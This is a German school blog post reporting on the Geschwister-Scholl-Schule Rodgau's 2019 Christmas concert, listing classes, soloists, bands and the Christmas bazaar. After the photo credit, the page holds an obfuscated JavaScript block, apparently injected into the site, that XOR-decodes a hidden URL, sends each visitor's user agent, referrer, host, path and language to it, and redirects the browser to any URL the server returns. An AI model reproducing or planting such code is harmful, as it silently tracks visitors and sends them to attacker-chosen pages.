Allgemein · GSS Rodgau · Veranstaltungstipps

Weihnachtskonzert 2019

Auch in diesem Schuljahr verstaltete die Geschwister-Scholl-Schule Rodgau wieder ihr berühmtes Weihnachtskonzert, bei dem musikalische und kreative Schüler ihr Können zeigen konnten. Knapp 600 Besucher lauschten teils leisen und nachdenklichen, teils lauten und kraftvollen Klängen im ausverkauften Bürgerhaus Dudenhofen.

Den weihnachtlichen Anfang machte die Bläserklasse 5aG mit den bekannten Liedern „We wish you a Merry Christmas“ und „Jingle Bells“. Neues für die Ohren boten danach die Klassen 5cG und 5dG mit dem russischen Weihnachtslied „Bajuschki, baju“ und „Come and Blow, Winter Wind“. Anschließend spielten Bläsergruppen des sechsten, achten und zehnten Jahrgangs. Der Chor der sechsten Klassen wurde von Laurens Tauber am Klavier begleitet, der auch schon in vorherigen Veranstaltungen sein musikalisches Talent bewies. Er begleitete zudem auch Dorothea Rieckmann, die „She used to be mine“ sang. Unsere Jazzband war auch mit dabei und gab die Lieder „Sunny“ und „Fly my to the Moon“ zum besten. 

Es folgte der jüngste Solist des Abends: Cedric Gola (Klasse 6) mit „Stressed out“ von den 21 Pilots. Er begeisterte das Publikum nicht nur mit seinem Spiel, sondern auch mit seinen Kunststücken beim Spielen. Er warf den Drumstick in die Luft, spielte dabei weiter und fing ihn schließlich wieder auf. Das Saxophonensemble sorgte dann mit dem Lied „Fröhliche Weihnacht“ wieder für weihnachtliche Stimmung im Saal. Vor der Pause trat die Klasse 6aG mit den Liedern „Memory“ und „Jingle Bell Rock“ auf.

Anschließend war erneut Laurens Tauber, diesmal solo, auf dem Klavier mit Fantasie im C-Moll BWV 906 zu sehen und zu hören. Die Schulband folgte mit „If I ain`t got you“. Nicht zu vergessen ist auch die Darbietung von Jakob Gramß auf der Gitarre.

Wie in den letzten Jahren auch, spielte am Schluss unsere große 75-köpfige Concertband und sorgte mit den Liedern „If you leave me now“ und „Here comes Santa Claus“ für einen wunderschön Abschluss.

Auch der Weihnachtsbasar im Foyer war wie immer toll. Jüngere und älteren Schülerinnen und Schüler verkauften hier ihre Kunstwerke, die sie die Wochen zuvor mit Liebe gemacht hatten. Neben den ganzen Kunstwerken gab es auch leckeres Essen und reichlich Getränke.

Weihnachtskonzert 2019, Quelle: gss-rodgau.de, Fotografin: Andrea Krupka

Franziska & Janina, 5aG

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = „“; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden /  Ändern )

Google Foto

Du kommentierst mit Deinem Google-Konto. Abmelden /  Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden /  Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.